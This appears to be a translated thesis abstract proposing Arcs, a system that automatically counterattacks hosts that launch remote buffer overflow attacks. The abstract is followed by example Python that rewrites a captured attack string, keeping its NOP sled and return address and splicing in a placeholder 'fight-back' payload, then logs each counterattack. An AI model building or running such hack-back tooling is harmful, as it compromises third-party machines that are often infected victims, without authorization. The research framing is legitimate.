In the world of information security, buffer overflow vulnerabilities and attacks are an extremely important area, affecting countless system users worldwide. With an ever more tightly connected global network, and an ever more competitive global market for the development of information systems, time and cost pressure mean that many services and programs that were never carefully developed or fully verified are in wide use on the network. These programs contain many vulnerabilities, and the most serious of them is the buffer overflow vulnerability, which can be exploited to execute remotely injected malicious code. As commercial activity has gone digital, controlling computers and the information on them has become another route to wealth; this trend has led attackers to treat intrusion as a source of income, so their attacks have become stealthier and smaller in scale. To this day the number of buffer overflow vulnerabilities appearing in newly developed programs has never decreased, and most of the effective countermeasures available today merely reduce the success rate of a buffer overflow attack to a minimum: given enough time and enough attacking hosts, and without much attack intensity, these countermeasures still struggle to withstand an attack that is simply retried a few more times.

Organized, low-profile buffer overflow attacks imply long-lasting, low-intensity, repeated attempts, and whether the goal is a botnet or worm propagation, the most effective method is the buffer overflow attack. Although such attacks have become quieter and smarter, what has not changed is that a buffer overflow attack targets a vulnerability in a program, and the host launching the attack very likely contains the same vulnerability. To be more proactive and more efficient, we want to deal not only with the buffer overflow attack itself, but also with the attacking computer, and even with the remote malicious group controlling all of it. Attack discovery and detection must therefore be efficient and flexible enough, and the response we take must be able to deter the people behind the attacks.

Combining the above ideas, we construct an automatic real-time counterattack concept. Through the implementation of automatic real-time counterattack and research into real-time counterattack methods, we hope to replace passive defense with active deterrence, to replace attack-neutralizing strategies with a real-time counterattack mechanism, and to lower the probability of being attacked by malicious attackers. At the same time, counterattacking gives attackers something to worry about before launching an attack, and collecting attack data leaves attackers hiding in every corner of the world with nowhere to hide.

In this paper, we discuss a new idea against remote buffer overflow attacks launched by internet worms, botnet owners or unknown attackers. We also develop a prototype system called Arcs (Automatic Real-time Counterattack System) to evaluate the performance of this architecture. The results of system testing show that the mechanism indeed works, meaning that it is a usable and more efficient way to combat remote buffer overflow attacks from internet worm propagation and botnets than the strategies proposed before. The propagation of a worm depends on which vulnerabilities it exploits, and remote buffer overflow attacks remain an efficient method for a botnet to take control of vulnerable hosts. This vulnerability-oriented characteristic tells us that a compromised host that has not been patched can be compromised again. Unlike the crude, invasive and unrestrained "white worm" strategy, we propose a controllable and acceptable automatic real-time counterattack mechanism, which attacks only those who attack us.
After an attack is detected, we make a duplicate of the original attack string, replace the malicious injected code in this duplicate with our own fight-back injected code, and then use it to counterattack. In the ideal situation, we successfully compromise the attacking host and execute our injected code instead of the original malicious one. We build a database to record the information of each counterattack, including the address and port of the attacking host, the time, and the result of fighting back. We discuss in detail possible Arcs-based worm and botnet solutions and the contribution of Arcs, which follows from its efficiency and flexibility. Arcs can be used for many different purposes according to the needs of different system administrators. This paper focuses on an introduction to Arcs, the modification of the remote buffer overflow attack string, its influence, and possible Arcs-based worm and botnet solutions.
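As an added illustration of the attack-string modification and the counterattack record described above (this is example code, not the Arcs implementation from the thesis), the following Python splices a fight-back payload into a copy of a captured attack string and logs the counterattack in an in-memory SQLite table. It assumes a classic stack-smashing layout that the thesis does not spell out: filler bytes, an x86 NOP sled, the injected code, and the overwritten return address repeated at the tail. The sample attack string, the placeholder payload bytes, the host address and the function names are all constructed for this example. The checks a practitioner wants are built in: the rewritten string keeps the original length, the return-address bytes are untouched, the payload is placed at the end of the region so the NOP sled is never shortened (the attacker's return address still lands on NOPs), and bytes the original exploit had to avoid are rejected.

```python
"""Example (not the thesis's Arcs code): rewrite a captured remote buffer
overflow attack string so the injected code is replaced by a fight-back
payload of the same total length, then record the counterattack."""
import datetime
import sqlite3
import struct

NOP = 0x90  # x86 NOP; assumed to be the sled byte used by the attacker


def find_return_address_tail(attack, width=4):
    """Find the trailing run of one repeated `width`-byte value, i.e. the
    overwritten return address copied several times at the end of the string.
    Returns (start index of the run, address bytes) or None if not repeated."""
    if len(attack) < 2 * width:
        return None
    addr = attack[-width:]
    start = len(attack) - width
    while start - width >= 0 and attack[start - width:start] == addr:
        start -= width
    if start == len(attack) - width:
        return None  # the last word is not repeated: no recognisable tail
    return start, addr


def find_nop_sled(attack, end, min_sled=8):
    """Longest run of NOP bytes in attack[:end]; returns (start, stop) or None
    if no run of at least `min_sled` bytes exists."""
    best, run_start = None, None
    for i in range(end + 1):
        in_run = i < end and attack[i] == NOP
        if in_run and run_start is None:
            run_start = i
        elif not in_run and run_start is not None:
            if best is None or i - run_start > best[1] - best[0]:
                best = (run_start, i)
            run_start = None
    if best is None or best[1] - best[0] < min_sled:
        return None
    return best


def build_counterattack(attack, payload, bad_bytes=b"\x00"):
    """Return (counterattack string, return address). The region from the
    start of the NOP sled up to the return-address tail is replaced by NOPs
    followed by `payload`; everything else is copied unchanged."""
    tail = find_return_address_tail(attack)
    if tail is None:
        raise ValueError("no repeated return address found at the tail")
    ret_start, ret_addr = tail
    sled = find_nop_sled(attack, ret_start)
    if sled is None:
        raise ValueError("no NOP sled found before the return address")
    region_start = sled[0]
    region_len = ret_start - region_start
    if len(payload) > region_len:
        raise ValueError("fight-back payload longer than the injected region")
    if any(b in bad_bytes for b in payload):
        raise ValueError("payload contains a byte the original attack avoided")
    # Left-pad with NOPs: the sled only grows, so the attacker's own return
    # address still lands on a NOP and slides into our payload.
    new_region = bytes([NOP]) * (region_len - len(payload)) + payload
    out = attack[:region_start] + new_region + attack[ret_start:]
    assert len(out) == len(attack)
    return out, ret_addr


def open_db():
    """In-memory stand-in for the counterattack database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE counterattack "
               "(host TEXT, port INTEGER, time TEXT, result TEXT)")
    return db


def record_counterattack(db, host, port, result, when=None):
    """Insert one record (attacking host, port, time, result); returns the
    number of records now stored."""
    when = when or datetime.datetime.now(datetime.timezone.utc).isoformat()
    db.execute("INSERT INTO counterattack VALUES (?, ?, ?, ?)",
               (host, port, when, result))
    db.commit()
    return db.execute("SELECT COUNT(*) FROM counterattack").fetchone()[0]


# Constructed sample: 16 filler bytes, a 32-byte NOP sled, 12 arbitrary
# non-NOP bytes standing in for injected code (not real shellcode), then a
# made-up return address repeated four times.
SAMPLE_RET = struct.pack("<I", 0xBFFFF5A0)
SAMPLE_ATTACK = (b"A" * 16 + b"\x90" * 32
                 + bytes(range(0x31, 0x3D)) + SAMPLE_RET * 4)
FIGHT_BACK_PAYLOAD = b"\xcc" * 8  # placeholder for the fight-back code

if __name__ == "__main__":
    counter, ret = build_counterattack(SAMPLE_ATTACK, FIGHT_BACK_PAYLOAD)
    db = open_db()
    n = record_counterattack(db, "192.0.2.10", 31337, "sent")  # constructed host
    print(len(counter), ret.hex(), counter[16:60].hex(), n)
```

Whether the counterattack succeeds still depends on the attacking host exposing the same vulnerable service with the same stack layout, which is exactly the "vulnerability-oriented" assumption the paper relies on; the checks above only guarantee that the rewritten string is structurally equivalent to the one that was captured.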